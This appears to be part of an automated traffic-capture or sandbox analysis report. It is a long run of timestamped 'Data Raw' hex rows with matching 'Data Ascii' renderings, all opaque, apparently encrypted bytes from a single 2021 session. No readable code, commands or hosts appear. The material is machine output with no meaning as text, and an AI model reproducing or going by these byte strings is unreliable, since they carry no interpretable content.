                                              Data Ascii: 1^"b:[Lsk"9.#Vwi^U&lz$J<U/)[e{,ael(I*_C$F*}{^8eo/Q>!2 pzWp-vgw[P1i/HG_.@2M T*qFVB6M
                                              2021-09-28 11:02:14 UTC50INData Raw: ee 49 bf a4 95 6f f5 3a 09 c8 45 77 20 db b3 8c 58 91 6e 06 80 0f db 08 d9 cb 92 f1 b7 98 72 e2 b6 5f 22 f7 9a ed 0f 38 c4 51 0a e3 78 a9 e3 8a aa 4b 7b 60 c7 f5 65 d8 b0 d5 eb 9e 3b 2a 08 83 3e 60 08 7c 40 b8 85 1d 69 44 47 45 d5 ff 53 ec 91 36 5d 73 cb f1 a2 66 40 b7 6b 98 31 3a e0 80 53 86 5e 45 c8 ae bc 33 c7 9e 9b 22 64 c4 0f b6 ad 6a 9c d1 4f b2 a9 5a 50 71 de 00 69 e5 b2 0b 30 a0 8e 2e b2 f5 d2 66 e3 ec b9 f8 5d ee f3 ff 62 6c 72 bb 98 68 e3 eb cc 0d e8 f0 12 4f 4b 16 39 f7 b3 50 25 0d e2 f6 3f e6 68 3a a8 80 87 58 68 fe 0f 53 1c c5 71 13 7b ef cb 6f 9b 6b c8 31 fd d6 f7 bd fb 2d b6 1a b1 5d 51 21 ce eb f6 47 fc 0f 07 fc 71 68 bc 9f 2d c8 3d 88 d5 ef f4 77 20 e2 82 48 dc f7 16 a6 f2 97 60 7c 6d 2f ed 78 93 24 51 3f 38 e1 dc ff b9 9d ba ad 74 f8 98
                                              Data Ascii: Io:Ew Xnr_"8QxK{`e;*>`|@iDGES6]sf@k1:S^E3"djOZPqi0.f]blrhOK9P%?h:XhSq{ok1-]Q!Gqh-=w H`|m/x$Q?8t
                                              2021-09-28 11:02:14 UTC51INData Raw: 76 94 d9 34 3e 85 59 9b 0f 7f 31 9d 51 ba 9a 84 38 1a 24 51 b9 67 6b c8 7f 02 c4 30 94 7e 89 76 b7 fa c5 09 11 68 ce 52 5c 7b 26 95 39 a3 52 f2 6a a3 2d d4 d4 0b 34 cc 90 7a d9 e4 7d e4 47 5b 7a ac 1b e0 6c 45 2e 80 5d 0d 1a c7 0b 45 7d e6 e1 97 3c 2b e1 0d 53 1b b0 62 6f 7a f9 d6 f7 c2 0e 96 2f 28 7c 6f 59 a3 a7 00 9f de a5 fd 02 8b 6c 64 39 9c c7 0c 24 55 f7 56 a6 06 8f 03 9a bd e0 cd 08 fe 90 69 71 10 be b9 8e c1 39 76 0d cb 59 80 c1 6c 46 e2 eb db 71 87 a9 a7 92 a5 d5 89 53 f4 ac a1 08 28 1f f7 db 29 8e 88 60 db 76 7e ea ae b7 55 ca 88 81 6e 2e 24 70 a6 88 0a 73 51 87 ed 77 a9 d7 c9 b1 a3 a5 3c 76 4c 31 ca ca 32 43 db 9a 74 53 a7 bd 0b 0a ae b9 97 6c 8c e0 c1 0b 6a 4d 95 5c e3 f2 38 9c e8 e5 f3 6b 85 78 5e 9e 74 9a 00 a2 15 05 0b 9d 37 cf b4 5a f4 a7
                                              Data Ascii: v4>Y1Q8$Qgk0~vhR\{&9Rj-4z}G[zlE.]E}<+Sboz/(|oYld9$UViq9vYlFqS()`v~Un.$psQw<vL12CtSljM\8kx^t7Z
                                              2021-09-28 11:02:14 UTC52INData Raw: 00 ac a0 34 2c b2 f9 d2 23 e3 ec b5 9f 42 ff fe f0 59 a7 63 b3 8f 77 e0 5b db d7 c1 e5 06 5e 74 11 28 6a 84 78 c5 0c 40 e1 38 fb 0f 0c 82 23 81 4b 68 fb 2d 81 1a ed a9 04 f6 ee a4 47 98 78 db 31 e2 d1 eb 5e e0 2f b6 1d 02 46 55 3c b5 d9 dc e4 fa 1e 07 c0 84 a8 bf 99 44 f5 b2 8f d3 31 f9 4c 01 f3 94 54 e3 43 29 a6 f8 48 c2 7c 76 2c 2f 7f b6 96 5c 2e 3c 7b 43 04 89 62 43 44 27 ea bd 3e f6 04 c5 bc 1f 6d bb 43 6e 7a 91 1e d8 f4 e0 44 d8 ff 44 7e 11 99 74 b4 47 67 d5 a7 bd d0 92 ab 9d f0 5b fe 5a b8 f4 e8 cb a7 8e 88 a2 aa 2a 8d 24 48 46 2b e3 86 c5 40 e1 0a 0f 87 ee c5 d7 59 81 06 1a 58 4e 20 52 27 5b 83 70 dd 07 aa 08 dd 4e ab 49 73 78 09 a1 6a 7f 39 dd b0 3d 09 b3 bd fc 2b 57 fe b2 01 5c a8 58 2d 1b a3 86 20 63 6a 74 c2 d1 de be 4e 9a 8a 2a 42 f9 1e 65 3a
                                              Data Ascii: 4,#BYcw[^t(jx@8#Kh-Gx1^/FU<D1LTC)H|v,/\.<{CbCD'>mCnzDD~tGg[Z*$HF+@YXN R'[pNIsxj9=+W\X- cjtN*Be:
                                              2021-09-28 11:02:14 UTC54INData Raw: 7d f1 ce 22 e8 bf 76 7a af 8b 95 87 ca 28 72 3c 91 46 8c d2 23 47 f3 ee 67 8e 86 85 bd 94 a7 ba 40 53 f4 a6 93 96 35 0c f4 db 38 8b 5c 9f da 5a b4 f3 bd b2 40 db 8d 9a 8a 2f 08 74 96 76 13 60 3c 86 fc 72 ca 29 c8 8c d3 08 2f 73 46 2a e7 3b 3d bd dc ba 08 44 a2 85 08 fd 3e f6 9e 46 86 ed c8 77 eb 48 95 b1 f1 fe 2e e0 e3 dd f7 7c 96 72 77 41 64 91 9a b1 00 06 01 67 59 53 b3 4b fb b8 25 ef 38 62 c3 ec 43 55 df 5a 0c b0 e3 ac 24 1b 2e 61 cd 9b dc d1 9c c2 41 f6 0a e4 15 6a 55 aa 49 af b0 49 dd 6c 61 7e b3 af 62 f8 da 10 e9 a6 37 97 dc 3e af ce 63 18 6c 79 bb 85 a3 ea 1c bd 94 ad 18 03 48 29 a4 2e 62 ee 18 7d 2e 7a 95 13 57 97 91 e0 df 30 f7 90 0f 08 7e 2e 07 ac 53 e6 5e d8 3e 55 6c ff 14 bd 02 44 7d 39 fb 69 8b 70 7e 02 ca 87 1e d4 33 2d c1 ba 6b 9f 6b 7b ca
                                              Data Ascii: }"vz(r<F#Gg@S58\Z@/tv`<r)/sF*;=D>FwH.|rwAdgYSK%8bCUZ$.aAjUIIla~b7>clyH).b}.zW0~.S^>UlD}9ip~3-kk{
                                              2021-09-28 11:02:14 UTC55INData Raw: 98 1c e9 fb c6 b6 0a 49 ec f9 6e 70 88 11 e9 df f2 44 c3 33 59 61 c5 9f 72 fc 33 31 d4 a7 bd cf 88 be 8f f0 4a f7 45 b4 0a c8 e7 ba 9f 9b b5 27 75 97 24 49 54 24 f2 89 d3 00 da 97 1e 21 81 8c d6 51 8a 15 13 4b 43 33 40 3d 4a 91 6e cf f9 ab 24 c2 5f a1 5f c8 51 09 a5 4d 78 2f f5 8b 3d 09 b9 b1 bc 88 57 ed 82 1d 4f 98 4b 2d 0a c3 99 29 8c 7d 4b c2 ff 32 b3 51 90 99 29 45 f7 05 84 24 69 b4 e5 9b 56 d9 e0 4c 1b 32 b1 0e 2a 8b 7e f1 5c ac 0d f5 29 8f 69 64 fa 3e 4c 73 fd e8 d8 e4 1f 5e be 78 0d e1 d3 f6 63 de 8a 7e 52 7e 85 5f ea e0 b7 05 35 e1 59 39 98 59 5a 99 94 3e 76 2e 9a 75 1e cf 7a 23 d2 0c 8a 05 20 c7 d3 86 09 e4 85 05 e5 aa ba ad e2 d1 1b 52 3e 9f 90 7a fa 91 86 e7 3c 29 80 98 6f 11 59 21 80 42 b9 9f 8d d4 04 06 a6 90 65 6e de 6a 1e c2 2c 82 6c 98 62
                                              Data Ascii: InpD3Yar31JE'u$IT$!QKC3@=Jn$__QMx/=WOK-)}K2Q)E$iVL2*~\)id>Ls^xc~R~_5Y9YZ>v.uz# R>z<)oY!Benj,lb
                                              2021-09-28 11:02:14 UTC56INData Raw: ba 30 ef 2a 71 db ce 49 aa ce 53 0a 63 d8 4a 36 12 39 1d 41 39 21 24 4b 80 54 d3 28 c0 13 7b 59 91 d4 dd 0a 43 f1 63 b1 82 8b af 62 e3 01 3a 1f 8f 3e bb b3 cd b2 ce 69 30 f0 79 bb ae b0 e0 0d 72 87 a8 30 72 49 29 a2 54 d0 ef 18 6d 06 e6 94 08 6d 81 97 4b ae 31 f7 ec 1c 0f 7e 58 95 5d 50 ec 52 9f d7 54 6c f3 53 c5 03 44 7d 39 f7 06 b1 58 9b 0b c7 a9 21 d3 1b d9 ce c4 51 b7 98 72 e2 ad 59 22 f7 e6 5a 1f 3f e3 5b 05 87 14 c1 e1 80 b9 58 63 09 ef 2f 76 c0 b2 db c0 b1 2f 39 1d aa 23 4a ca 7f 51 a8 bc c9 f0 57 4e 7c d0 d3 ae ea 80 3f 62 da 94 f1 a8 4f 5c a0 7a 8d 0f 0b ef 1d 44 bd d4 0d c9 a4 9e bc cb 8f 9d 27 f2 d9 12 d5 5e f1 8f de 2f 43 b9 56 39 ab d7 11 6a 98 9d 11 aa 88 e8 2f b2 ef fd ca ca 7d bf eb 5a 48 e9 3d c7 ba 71 bb 9f 6c 63 c7 8a 1c f9 f2 01 49 77
                                              Data Ascii: 0*qIScJ69A9!$KT({YCcb:>i0yr0rI)TmmK1~X]PRTlSD}9X!QrY"Z?[Xc/v/9#JQWN|?bO\zD'^/CV9j/}ZH=qlcIw
                                              2021-09-28 11:02:14 UTC57INData Raw: 1b 93 b5 cf fb 6d cb f1 5b 93 94 87 51 3e 8a 7e e4 a2 b0 3a dd 0f 9d 76 4e 17 35 48 40 8e ca d0 3a 19 93 a3 42 04 c5 c1 f6 78 df 9e 16 16 7f a9 5c d9 08 8f 05 35 f4 9b 28 8c 73 4c a1 8b 23 88 6e 82 7f 0f c5 6d b9 c1 b1 95 1b 33 91 d3 97 1b 04 9d fb e4 89 b7 bc ee e3 ff 52 3f 99 83 7f e5 8e 95 f5 3c 32 93 8f 91 00 74 22 98 44 ab 9f 9c dc 1b 08 59 8a 79 6d c8 16 0c dd 23 ed 7e 98 62 dd be c4 25 1e 74 ec 66 4d 7e 20 88 4f a7 59 0c 6d 84 0d fc ca dd 3f fb b8 69 dc ee 44 c3 5d a5 7d a8 0d e8 6e 46 1c de b2 0d 10 e1 08 52 7d e8 e4 97 30 00 c4 1a 3c fe 98 40 61 52 2a ff d3 c8 6f b4 93 35 7d 65 77 5c a0 73 2f f6 81 f7 28 86 0f cc 31 8f c8 63 8d 51 ea a2 b4 23 b2 f7 91 a3 f3 da 01 c7 2c 77 7a e4 ac 91 f4 ea 2a 72 3a d4 43 8b c3 6d 29 49 ef c7 85 e9 fb aa 94 ad d5
                                              Data Ascii: m[Q>~:vN5H@:Bx\5(sL#nm3R?<2t"DYym#~b%tfM~ OYm?iD]}nFR}0<@aR*o5}ew\s/(1cQ#,wz*r:Cm)I
                                              2021-09-28 11:02:14 UTC59INData Raw: ca a0 57 0a 97 88 ea 14 32 9a 70 0d e8 af d3 e7 9b ac 49 42 4e d4 2f 70 dd 2e d9 d3 a7 38 39 00 83 3e 5e b4 1b 40 be a9 7e 7b 4c 55 40 f6 1f af ec 9b 21 4c ea bc d8 a6 67 55 b3 f7 8c 27 25 ec 0e 4a 84 39 1a de 22 3d 20 cb 8e 35 25 f6 dc 0a 92 72 f1 8f de 2d 42 bc 72 7c 66 d7 17 77 79 b9 11 aa 89 fb 27 a3 f7 ab ef 87 ec bf ef f2 ee f6 ff 5e 87 b9 ba 9e 75 7f ea d8 25 c2 e7 06 58 48 8d 28 7b 8c 51 36 04 51 ef 3d e5 f0 a2 80 23 86 fa 73 e2 33 84 37 0d 76 04 fc f9 cd 7b b2 54 d9 20 ee d6 6d 36 c4 2d b7 0f 07 58 6c 96 da ff d4 90 71 0f 0d e9 4a ae ae 9a 22 c9 b9 01 62 80 d9 65 36 f9 98 76 5c 7b 29 ac fa f9 d4 6c 7b 31 ea 68 aa 83 79 a3 32 f5 fe 30 64 8c 99 93 ce ff 98 1c d2 03 d1 bd 24 59 c8 f9 64 a4 9b 12 da cc e0 45 c2 21 46 78 3b 8b 5e 2b f8 67 c4 bd bd d0
                                              Data Ascii: W2pIBN/p.89>^@~{LU@!LgU'%J9"= 5%r-Br|fwy'^u%XH({Q6Q=#s37v{T m6-XlqJ"be6v\{)l{1hy20d$YdE!Fx;^+g
                                              2021-09-28 11:02:14 UTC60INData Raw: 5b ed 00 c4 23 7b 54 c6 48 49 79 37 8c 53 a9 59 0c 61 51 70 ae ec df 39 d5 88 60 cd ed 44 b6 5b a5 7d ef 01 ea 6e 4a 25 e6 a3 0a 75 e9 16 55 53 d8 e9 86 33 00 e5 1b 3c f2 df 44 67 52 2a c6 fe e0 2c ba fc 2f 13 4f 73 77 a0 07 84 ff ee e8 03 81 6a a5 25 aa ea 3b 35 50 e0 bb ad 59 30 15 90 a9 ff e0 30 ef 95 7c a4 ec b8 bf 8f e2 28 72 3c 86 5a 8c d2 69 46 f3 ee d5 8f 86 85 bd 95 a7 ba 68 52 f4 a6 86 96 35 0c e8 db 38 8a 8c ae de 5a 49 f3 bd b2 d4 db 8d 8b 86 3c 03 4d 1f 46 16 60 54 96 f7 6a 41 28 e4 93 a2 dd e6 73 4c 2a d5 88 28 93 fd af 65 73 a2 94 09 ec af 47 b3 4f a4 ce c3 18 5c 63 8f a8 e9 f2 29 f8 ff 1b e3 51 95 6a 75 46 75 8b 0b b8 fa 0e 3c 20 16 e3 b6 4b f1 26 0b fe 3d 4e cc 27 ba 43 d2 62 8f b5 cb 43 31 08 2f 18 6c 93 de d2 db bf 40 f6 0a e4 1b 72 44
                                              Data Ascii: [#{THIy7SYaQp9`D[}nJ%uUS3<DgR*,/Oswj%;5PY00|(r<ZiFhR58ZI<MF`TjA(sL*(esGO\c)QjuFu< K&=N'CbC1/l@rD
                                              2021-09-28 11:02:14 UTC61INData Raw: a5 00 2f 7b 08 50 25 1d 56 f4 2d ca b1 2e 80 23 87 49 64 f5 2e 6e 1e e9 7f 0d e1 3e c6 70 90 6b db 20 f9 c6 ff 3b 3a 2c 9a 12 1a 5d 41 07 f4 e0 d5 f7 fa 0f 1c ee 42 55 be b3 27 ce b4 e0 1c ef f5 6e 25 f6 88 4d cd 7b 38 a0 eb 68 c3 41 7d 39 ea 68 a1 94 57 3f 23 f3 e9 c5 bb b1 b0 aa fd f6 f7 f7 c0 04 cf ba 12 72 ce f9 7f 7c 81 eb f1 e0 e5 52 df 3a 55 7e 3b 8f 58 e2 f5 66 f9 a4 a5 c3 94 ad 8c f6 45 1b 5b 94 e9 ce c3 8f 6c 9d a2 a0 32 f6 0c 9b 46 2b e9 ae 11 1e e1 00 27 0a ee c5 dd 5a 9f 0f 09 52 4e 31 54 25 a5 82 5d d4 2f 84 0a db 48 a0 50 41 7f 09 b0 4b 62 c7 dc 89 35 31 d5 58 03 d4 4b fe 84 02 4d 8d 4f d3 1a fd 85 37 61 7a 67 d4 ef 3e b5 b0 9b a6 39 6e e3 2f b5 c4 68 4a e1 d3 46 c9 fb 75 d2 84 8e 34 2c a3 18 ef 7c b5 70 e3 39 9d 7c 6c 62 3e 60 72 e1 dc db
                                              Data Ascii: /{P%V-.#Id.n>pk ;:,]ABU'n%M{8hA}9hW?#r|R:U~;XfE[l2F+'ZRN1T%]/HPAKb51XKMO7azg>9n/hJFu4,|p9|lb>`r
                                              2021-09-28 11:02:14 UTC63INData Raw: ab 47 4c ea 86 13 96 35 0c 6e ca 3f 94 80 88 46 4b 7a ed 9d 92 aa db 8d 9a 0c 3e 0f 6a ac 50 8a 71 53 98 de 64 23 38 cf 82 83 a4 b3 62 4b 3f eb f5 be bd da b6 ea 69 a5 9a 27 e3 cd 57 98 59 aa c0 41 18 5a 49 09 aa e5 ed 1f e5 74 f4 e5 62 be 52 e6 4d 75 9a 9c b3 03 10 39 43 b6 e3 b2 4b 6d ba 27 e1 17 59 5a 20 b1 4a f4 4c 81 a4 cc 5c 0b 0d b4 1f 78 85 f1 fb 34 5e 41 f6 9c e6 14 64 7d a2 39 ae b0 43 6d 78 bb b5 9c b9 fe f8 d8 27 29 85 b7 91 b3 8c 32 df 6e 2f c1 6f 27 9e b7 ff 3f 97 7a a8 30 94 d7 38 a5 5e e3 f9 84 66 01 f9 a1 33 dd 86 97 c8 30 20 f0 89 29 2f ef 2b 2f 5d cc f7 5f a8 ba 74 ec f5 3c 21 9e 55 70 35 c4 6e 11 49 9c 1e f2 9e 5a 4d 0a d8 dd 83 72 d9 04 69 cd bf 67 3d 90 15 fb 19 20 d2 49 6e 74 b4 c7 fe b6 b5 31 f6 77 d7 30 4b d5 c6 42 c2 a0 26 14 17
                                              Data Ascii: GL5n?FKz>jPqSd#8bK?i'WYAZItbRMu9CKm'YZ JL\x4^Ad}9Cmx')2n/o'?z08^f30 )/+/]_t<!Up5nIZMrig= Int1w0KB&
                                              2021-09-28 11:02:14 UTC64INData Raw: f8 cc a9 9d f6 34 57 5b b8 fe dd 35 a6 98 62 a3 ca 75 ae 32 4a 47 2b 90 a4 c7 1f e7 19 05 34 63 d0 d7 51 81 15 00 45 54 36 7a 66 5f 83 77 7f 16 b0 1f f3 12 af 49 54 db 18 bb 55 56 64 d9 a5 3b ab a2 bd e5 03 08 e9 82 04 fe 9a 43 3e 12 f9 a8 22 72 7a 74 c2 f8 28 ad 5b 8c 99 2f 6e d7 06 8e 2a 83 2f da 99 56 cc e0 50 fa 37 8f 3e 21 a7 67 ff 79 ae 12 9a 8a 9c 76 4e 70 2d 60 78 95 d9 d6 f5 15 65 4f 67 2c f4 d2 f1 63 d8 82 b3 bf 6b b8 42 c3 35 39 b2 07 39 54 2f a2 03 4f 8b 8d 4c 3a 2e b6 75 27 d4 6d b9 cb 19 9d 0a 3b ba a0 96 1b f1 4d ee e4 86 b6 94 fa f9 ff 58 0d 8a 92 75 f4 80 bd 69 3c 38 98 e0 b5 12 75 24 a0 eb ab 9f 9c d7 1d 1c 70 15 4b 69 ce 6e 83 da 23 91 7f 8b 65 bf 12 d2 34 1c 56 d5 48 4f 74 84 95 2a af 4f 1d 7c 9b 31 ca 43 f2 39 d3 9a 7a c4 f5 74 f7 4e
                                              Data Ascii: 4W[5bu2JG+4cQET6zf_wITUVd;C>"rzt([/n*/VP7>!gyvNp-`xeOg,ckB599T/OL:.u'm;MXui<8u$pKin#e4VHOt*O|1C9ztN
                                              2021-09-28 11:02:14 UTC65INData Raw: 52 91 d4 bf a2 54 7d 56 bc aa b2 87 cf e9 df 32 31 ff 37 91 b9 9b 78 43 42 30 f0 78 a8 81 a6 f3 00 a1 96 bb 18 ba 49 29 a4 52 df f9 0b 63 75 c4 97 13 5b 95 87 d9 bd 25 df fd 18 0f 69 32 a2 5a 50 e6 59 a4 ae 45 4e e3 2d 2f 2a 55 77 2a f9 da 9c 7a 8c 17 46 be 0f d1 1a 7d d3 98 75 a6 8a 50 db a0 5d 28 53 98 c8 0d 1c f8 75 18 fc bc 4d ce 8a aa 5c 79 42 c1 0b 60 dd 3f cf f7 b0 2f b6 19 b6 2e 5f 56 6e 64 a9 85 7b 6a 44 4b 72 cf f3 b8 7c bd 3b 5b dd 82 6b 8a 76 53 a4 70 98 29 34 c9 05 d2 b9 3a 1d ea b6 2c 08 da 8f 97 3e ed da 0f ab ae d8 0c d6 3c 42 be d7 51 62 d7 10 74 e0 aa 06 82 2f e8 2f b8 d9 ac 80 f6 c4 d3 ef 50 f9 e8 66 4d af 71 ba 8a 6b 7a fb e4 aa e9 e3 0c 78 4e 0e 38 f6 8b 50 25 0d 53 c4 3a d1 6a 38 0c 1c 87 58 63 48 36 b3 0b ed dc 04 f6 e2 eb bf 9a 78
                                              Data Ascii: RT}V217xCB0xI)Rcu[%i2ZPYEN-/*Uw*zF}uP](SuM\yB`?/._Vnd{jDKr|;[kvSp)4:,><BQbt//PfMqkzxN8P%S:j8XcH6x
                                              2021-09-28 11:02:14 UTC66INData Raw: 90 aa 73 f7 8a 72 51 05 73 45 90 ef 64 87 ac ca 9d a0 a3 20 5b 02 24 cf d3 51 a4 db b6 7c 55 b3 94 0d dd 01 42 9f 40 e3 f9 c0 18 50 70 51 bb e2 f2 29 e5 f7 ec 34 6e 8e 63 72 5b 46 cb 11 b4 1c d9 03 7b 1d aa a3 5b e2 8c 31 d9 2c 68 a9 12 b4 55 d9 4b 13 a2 46 44 27 1b 29 1d 5d 8b fe cd a5 46 cd c9 00 f7 12 d9 42 a0 d2 86 1b 43 f1 63 94 f0 b3 af 68 c1 35 39 19 af 1f 45 b2 8c a4 e6 4d 30 f0 73 d4 ab b2 e0 0b a6 9d bf e6 87 53 38 ac 56 5d e8 18 77 07 f5 b3 02 7b 90 86 d0 20 0e f7 96 1d ad 7e 0d 3b 75 fb e6 58 bd 93 74 e0 ca 3c 21 03 52 5f 98 f3 78 87 74 b4 10 c4 96 82 d6 1b df c3 a9 4e a6 bb 6e db b8 d1 1d f1 89 eb bc 2e ca 42 24 43 a5 c0 eb 95 d5 d1 55 66 d0 2e 60 e2 51 df d3 ad 03 76 f7 6d c9 5f d9 72 51 a6 be ca 52 e6 40 54 de c6 a3 d5 0a 31 4a fe 85 e2 9b
                                              Data Ascii: srQsEd [$Q|UB@PpQ)4ncr[F{[1,hUKFD')]FBCch59EM0sS8V]w{ ~;uXt<!R_xtNn.B$CUf.`Qvm_rQR@T1J
                                              2021-09-28 11:02:14 UTC67INData Raw: 86 c5 15 eb 1b 01 39 38 d6 d9 40 8e 17 08 65 e6 fe 5d 18 73 b4 71 dd 0d b9 07 f3 76 ab 49 58 a7 09 a7 67 7e 78 c1 a5 3d 09 b3 a7 fc 2d 56 ed 82 12 5e 8b 59 3b 19 d1 86 2f 72 7c 67 df e9 21 bf 55 aa 89 3b 69 e6 17 9b 21 97 b5 d8 96 44 e1 85 5d 95 8f 8b 29 fd 11 75 e9 78 97 6b f5 38 97 60 de 0e e1 72 50 b9 ca da ee 31 63 b4 67 2a f8 e9 ce 72 cc 9f bb ac 79 83 57 c2 20 b7 05 35 fe 45 32 92 59 59 91 8b 23 89 3c 86 7d 0f ec 6d b9 c1 0f 95 1b 22 c3 d8 bc 00 fb 9a ec 1a 87 9b be f6 f2 ff 55 28 67 82 53 e7 9f 9e f5 3b 20 6c 8e bd 12 5e 20 b3 b2 a9 9c f3 5b 1b 08 52 bb 49 69 c8 62 3e d8 23 29 7f 98 73 23 04 c4 34 3c 50 c6 48 49 75 55 3e 3c bc 52 06 74 95 0d 66 ce dd 33 c0 9e 41 f2 e6 6c e7 55 8d 55 82 29 ee 7d 48 25 ea 9a 79 1e cd 12 7d 71 c9 e0 9d 1e 19 e7 1a 36
                                              Data Ascii: 98@e]sqvIXg~x=-V^Y;/r|g!U;i!D])uxk8`rP1cg*ryW 5E2YY#<}m"U(gS; l^ [RIib>#)s#4<PHIuU><Rtf3AlUU)}H%y}q6
                                              2021-09-28 11:02:14 UTC68INData Raw: 5e 31 f0 79 8c 8e b0 e0 18 b7 85 a8 2a 94 4b 28 b9 71 d6 ef 79 77 06 e6 05 13 5d 97 e4 a9 ad 31 fd 9b 15 60 9a 2a 2f 57 43 e0 5a 9f ea 55 6c ff 2f 24 13 42 66 2f e5 69 88 d6 2c 6e 3c 80 0f db 10 d8 d5 60 7a 61 15 27 ca a0 5c 2e e0 8f fb 1b 29 f8 53 82 5f ad d6 8e 7d ab 5d 60 40 d8 5c 8e cb a3 d4 c0 a3 28 2e 02 4c 27 6d e2 48 40 be a7 cf 6d 50 4b 7c e6 d7 ae e6 4f 30 4c d4 94 f1 a2 66 43 a4 7a 8b 27 25 ed 53 0c 95 20 16 c9 ae b7 33 fb 8d 97 06 fe c8 1e 2b ba f0 9e c2 37 6f b3 5a 51 75 29 10 4c f6 a6 1a aa 8f fe d1 b3 d3 bf 86 e9 ec b8 f3 ae fe d2 e9 61 ad 5a 58 b6 e8 6e ec c6 0f c1 85 07 5e 55 6f 39 7a 8c 5a 0f 0c 40 fc 1b f1 7c e8 81 23 87 ca 62 ea 36 e3 a5 c5 77 0e fc c0 e5 6d 9a 7e ce 24 c0 ee e2 31 c2 21 c5 00 12 4c 42 3e f2 de da e4 fa 27 2e e8 59 a1
                                              Data Ascii: ^1y*K(qyw]1`*/WCZUl/$Bf/i,n<`za'\.)S_}]`@\(.L'mH@mPK|O0LfCz'%S 3+7oZQu)LaZXn^Uo9zZ@|#b6wm~$1!LB>'.Y
                                              2021-09-28 11:02:14 UTC70INData Raw: 36 d6 8b 59 41 e4 76 22 88 25 be 57 87 c1 6d bf e9 83 91 1b 35 fd 44 94 1b fd ee 07 e5 86 bd d3 13 f8 ff 58 28 91 ec 81 e4 88 9f e2 e6 2b 80 9c 95 28 52 23 98 51 d5 60 9d c6 11 00 49 95 26 69 ca 79 04 a6 22 93 7e 92 1c 1e 05 c4 2f 07 79 d5 4f 62 5c 58 b8 3c bc 52 04 7a 8b 4a dd cc dd 33 a8 9a 6b dc ee 03 51 58 a5 71 93 2e f9 69 61 31 d7 50 0d 1a cd 02 d8 7e c9 e0 96 25 2d f6 1d 34 e5 b4 0d 65 50 2c dd 8c ca 6d be f6 46 ce 64 71 7d 8e 11 95 f6 8b ee 04 90 66 56 35 52 74 0c 35 50 fb ae c8 59 8b 15 9a 73 e6 c8 08 ee bd 62 7a ee b5 a6 97 d9 2e 5a a0 c7 46 86 fa 60 47 f3 e8 d4 8a ad 8c ba 92 d3 a8 40 53 ef b5 96 87 30 24 fa da 38 8d 8c 96 cb 52 55 6e bd b2 5f f3 02 9b 90 25 25 10 fe 64 14 60 52 94 f5 63 b6 21 d9 99 cf b2 2d 73 46 5b cc d7 3e b7 b5 9c 74 78 a4
                                              Data Ascii: 6YAv"%Wm5DX(+(R#Q`I&iy"~/yOb\X<RzJ3kQXq.ia1P~%-4eP,mFdq}fV5Rt5PYsbz.ZF`G@S0$8RUn_%%d`Rc!-sF[>tx
                                              2021-09-28 11:02:14 UTC71INData Raw: aa 79 ad a5 56 81 36 22 f6 02 0c 09 2e 05 da a6 b6 31 c3 90 81 ca ff e4 13 b2 b3 e4 e0 d0 3e 44 a2 50 49 75 c4 19 60 e5 b6 0e b9 76 e9 03 b8 8c b8 93 e2 e6 b3 f4 44 ec f6 eb 5b a7 6e b1 60 7e 42 e5 dd 0a f4 fe 9a 41 54 13 27 7b 9d 58 3c f2 41 cb 22 e3 7b 38 9f 34 1b 42 71 e2 27 81 17 da 60 fa f7 c4 d8 69 98 6e df ae 5f d1 e5 27 ab 2b b4 1b 19 6a 5b 2d c9 f7 de f5 f4 10 18 16 58 87 b4 97 33 b0 99 8e d5 e5 ea 72 25 fb 94 4f c3 6c d7 a7 de 95 da 7e 73 3b e8 64 a4 8b af 3e 1e e7 f6 b5 0d 8a 66 ac 2f 72 b3 16 c1 05 d6 b3 13 6c db f1 6e 6b 93 0d 0e cd cc 4f cc ac 6d 78 3b 9f 4d f2 12 74 dd a7 ac d8 8d a6 63 f1 77 e2 4b bf f9 d6 c7 b4 86 9c b3 a2 30 69 25 64 4e 3a e4 91 da 4d 7d 11 1c 26 ee d4 df 4e 8e f8 1b 78 49 36 41 3b 44 8c 62 d5 07 bb 00 c4 47 55 48 7e 73
                                              Data Ascii: yV6".1>DPIu`vD[n`~BAT'{X<A"{84Bq'`in_'+j[-X3r%Ol~s;d>f/rlnkOmx;MtcwK0i%dN:M}&NxI6A;DbGUH~s
                                              2021-09-28 11:02:14 UTC72INData Raw: 36 e0 98 b8 66 52 2a c1 7a cf 6f be fd 3d 68 71 59 d4 a6 00 9f de 1d fd 02 8b 73 70 21 87 d6 24 ad 54 ea ae b1 a7 8d 15 90 a2 e7 dc 1c c7 36 76 7a e4 ab bd 51 cb 28 74 2a 4a 41 8c d2 68 52 e7 fa ef 2c 86 85 a1 bc 3b ba 40 59 dc 3f 97 96 33 24 fd da 38 8d 8c 94 cb 51 55 7d bc b2 5f f6 b2 8b 9a 07 87 74 8d 4c 3b 56 27 a5 fe 72 b9 3a c4 8c ac 9a b8 77 4c 26 a0 ff 3c bd dc a7 7a 69 a9 ea 26 f7 51 40 8e 4a 9d ea ae 3e 58 49 93 aa ee e3 31 9c c0 e7 e2 7b 90 63 6a 22 60 9b 00 a8 da 00 35 4b 01 e3 b2 41 e2 a6 08 c6 3d 4f cc ef b6 44 da 4d cb a6 ce 52 22 0a 27 30 d4 64 23 24 6a 4f 64 de 37 f7 13 71 40 8c c0 a3 98 7b f1 69 b6 74 b1 a9 48 e0 f5 38 19 e4 03 91 b3 8c ae ce 69 ba f0 79 bb b8 b1 e0 0d 76 84 a8 30 9b 4b 29 a2 5b d0 ef 19 77 06 e6 95 58 5d 86 97 5e ad 31
                                              Data Ascii: 6fR*zo=hqYsp!$T6vzQ(t*JAhR,;@Y?3$8QU}_tL;V'r:wL&<zi&Q@J>XI1{cj"`5KA=ODMR"'0d#$jOd7q@{itH8iyv0K)[wX]^1
                                              2021-09-28 11:02:14 UTC73INData Raw: ab bf 03 3a d1 af 85 ca e1 69 75 38 ec 9f 7e 49 7b 29 a6 6e 87 cc 72 77 1b 0d 6c bb 87 cd 2e 3c ea f9 24 d1 01 ad b5 e6 f1 87 5a 5d 15 cb a9 03 41 23 f9 6e 7a 07 04 fe df e5 43 a1 ac 47 78 3d 8d 5a 2b 1f 42 fd 90 bd d0 98 be 9b f6 57 cd 62 b8 f4 c3 16 60 8e 9c a2 bb 2e bf 70 4c 47 2d 8c 01 c4 1f e7 1c f1 2f ff c1 b8 d9 81 06 1c 42 b0 22 44 c3 5a e3 5d df 01 80 1e ca 4a c4 c1 53 79 0f b6 97 6d 36 ce ac 05 81 b3 a7 fc 3a 52 fc 8b 2a c1 8f 59 2b 74 5b 87 20 74 6f 6f d4 ed 30 b7 66 6c 89 3b 43 89 9d 9a 3b 91 a6 c4 85 43 d8 f8 75 0b 81 8e 38 44 01 7f ee 7a ac 18 86 30 9f 76 42 17 33 